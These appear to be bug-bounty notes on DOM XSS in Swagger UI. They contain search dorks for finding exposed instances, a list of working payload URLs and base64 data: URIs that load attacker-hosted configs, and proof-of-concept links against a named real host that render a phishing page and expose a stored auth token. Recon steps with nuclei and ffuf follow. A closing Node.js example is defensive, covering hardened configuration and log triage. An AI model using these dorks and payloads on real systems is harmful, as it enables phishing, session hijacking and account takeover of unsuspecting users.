💊Swagger-UI

Google Dork

site:broadcom.com intext:"Swagger UI" | intitle:"Swagger UI"
site:*.*.com intext:"swagger ui" intitle:"swagger ui" inurl:?url= 
site:*.*.com intext:"swagger ui" intitle:"swagger ui" inurl:?configUrl= 

Shodan Dork:

http.title:"Swagger UI" hostname:"*.target.com"

Query-string payloads (appended to the Swagger UI page URL):

?configUrl=https://jumpy-floor.surge.sh/test.json
?url=https://jumpy-floor.surge.sh/test.yaml
?configUrl=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/config.json
?configUrl=https://gist.githubusercontent.com/zenelite123/af28f9b61759b800cb65f93ae7227fb5/raw/04003a9372ac6a5077ad76aa3d20f2e76635765b/test.json

What is Swagger UI?

A very common library used to render API specifications in a nice-looking UI; it is used by almost every company.

It allows users to provide a URL for an API specification, such as a YAML or JSON file, and the UI fetches and renders that document.

---------------------------------------------------------------

Swagger XSS Payloads
https://xss.smarpo.com/test.json
https://jumpy-floor.surge.sh/test.json
https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/config.json
data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
data:text/html;base64,ewoidXJsIjogImh0dHBzOi8vdGVhcmZ1bC1lYXJ0aC5zdXJnZS5zaC90ZXN0LnlhbWwiLAp9
data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy1zYWx0LnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==

---------------------------------------------------------------

Steps to reproduce

POC with simple alert box:

  1. Open https://jamfpro.shopifycloud.com/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==

  2. You should see an alert box (screenshot: Zrzut_ekranu_2022-01-9_o_22.08.24.png)

POC rendering phishing page:

  1. Click the link: https://jamfpro.shopifycloud.com/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjogImh0dHBzOi8vdGVhcmZ1bC1lYXJ0aC5zdXJnZS5zaC90ZXN0LnlhbWwiLAp9

  2. You should see a phishing page rendered (screenshot: Zrzut_ekranu_2022-01-9_o_22.08.49.png)

POC of stealing auth token:

Jamf Pro stores the authentication token in localStorage under the authToken key when you authenticate using login and password, so my assumption is that it will do the same for SAML authentication (you will have to test that). If it's true, then taking over the account of the user who clicked the link would be trivial. The POC below will print authToken from localStorage.

  1. Authenticate to jamfpro.shopifycloud.com and click the link: https://jamfpro.shopifycloud.com/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy1zYWx0LnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==

  2. You should see an alert box with auth token.

Impact

An attacker can execute arbitrary JS code in the context of https://jamfpro.shopifycloud.com/, which means they can do whatever an authenticated user at https://jamfpro.shopifycloud.com/ could do.

---------------------------------------------------------------

How I found DOM XSS on Swagger-UI

Versions vulnerable to DOM XSS: 3.14.1 < 3.38.0

  1. Do a subdomain enumeration to find subs that use Swagger UI.

  2. Get the live subs.

  3. I ran nuclei on the live subs with -tags swagger to get only those with Swagger API or Swagger UI:

  4. nuclei -l live-subs.txt -tags swagger

  5. The result was: [swagger-api] [http] [info] h!!ps://something.example.com/swagger/ui/swagger-ui.js

  6. So I did some fuzzing: /swagger/ui/FUZZ

  7. You can run ffuf and use the large raft wordlist from SecLists.

  8. /swagger/index.html?configUrl=https://jumpy-floor.surge.sh/test.json

  9. And then finally I got this: https://something.example.com/swagger/ui/index.html?url=

  10. I tried "h!!ps://jumpy-floor.surge.sh/test.yaml" as a payload and it worked.

    Example of the POC link:

  11. h!!ps://something.example.com/swagger/ui/index.html?url=https://jumpy-floor.surge.sh/test.yaml
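Added example, not from these notes or from the Swagger UI project: a Node.js script that pins the Swagger UI init options which stop the ?url= / ?configUrl= parameters from being honoured (queryConfigEnabled, added in 3.38.0 and off by default there), and a small access-log triage that flags requests whose url/configUrl value is a data: URI or points to a host outside an allowlist. The allowlisted host api.example.internal and the log lines are constructed assumptions.

```javascript
// Added example (not part of the original notes). Runs under Node.js, no dependencies.

// 1. Hardened init options for a self-hosted Swagger UI >= 3.38.0. Hard-coding the
//    spec URL and keeping queryConfigEnabled false removes the attacker-controlled
//    ?url= / ?configUrl= input entirely (pass this object to SwaggerUIBundle()).
const hardenedSwaggerConfig = {
  url: "/openapi.json",        // fixed, same-origin spec
  queryConfigEnabled: false,   // ignore url, configUrl and other query-string config
  dom_id: "#swagger-ui",
};

// 2. Log triage. Hosts allowed to serve spec documents (assumption: your own spec hosts).
const ALLOWED_HOSTS = new Set(["api.example.internal"]);

// Classify one url/configUrl value: data: URIs and off-allowlist hosts are suspicious.
function classifySpecParam(value) {
  if (/^data:/i.test(value)) return "data-uri";
  let parsed;
  try { parsed = new URL(value, "https://placeholder.invalid"); } catch { return "unparseable"; }
  if (parsed.hostname === "placeholder.invalid") return "relative"; // path only, same origin
  if (!/^https?:$/.test(parsed.protocol)) return "bad-scheme";        // e.g. javascript:
  return ALLOWED_HOSTS.has(parsed.hostname) ? "allowed" : "external";
}

// Parse the request target out of a combined-format access-log line and return
// one finding per url/configUrl parameter that is not allowed or relative.
function flagSwaggerRequest(logLine) {
  const m = logLine.match(/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/);
  if (!m) return [];
  const req = new URL(m[1], "https://placeholder.invalid");
  const findings = [];
  for (const key of ["url", "configUrl"]) {
    const v = req.searchParams.get(key);
    if (v === null) continue;
    const verdict = classifySpecParam(v);
    if (verdict !== "allowed" && verdict !== "relative") findings.push({ param: key, verdict, value: v });
  }
  return findings;
}

// Constructed sample log lines (not real traffic).
const SAMPLE_LOG = [
  '203.0.113.5 - - [09/Jan/2022:22:08:24 +0000] "GET /classicapi/doc/?configUrl=data:text/html;base64,ZXhhbXBsZQ== HTTP/1.1" 200 512',
  '203.0.113.6 - - [09/Jan/2022:22:09:01 +0000] "GET /swagger/ui/index.html?url=https://jumpy-floor.surge.sh/test.yaml HTTP/1.1" 200 512',
  '198.51.100.7 - - [09/Jan/2022:22:10:00 +0000] "GET /swagger/ui/index.html?url=https://api.example.internal/openapi.json HTTP/1.1" 200 512',
  '198.51.100.8 - - [09/Jan/2022:22:11:00 +0000] "GET /swagger/ui/index.html HTTP/1.1" 200 512',
];

if (typeof require !== "undefined" && require.main === module) {
  for (const line of SAMPLE_LOG) console.log(flagSwaggerRequest(line));
}
```

The first two sample lines are flagged (data-uri and external); the third uses an allowlisted host and the fourth carries no spec parameter, so both pass.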
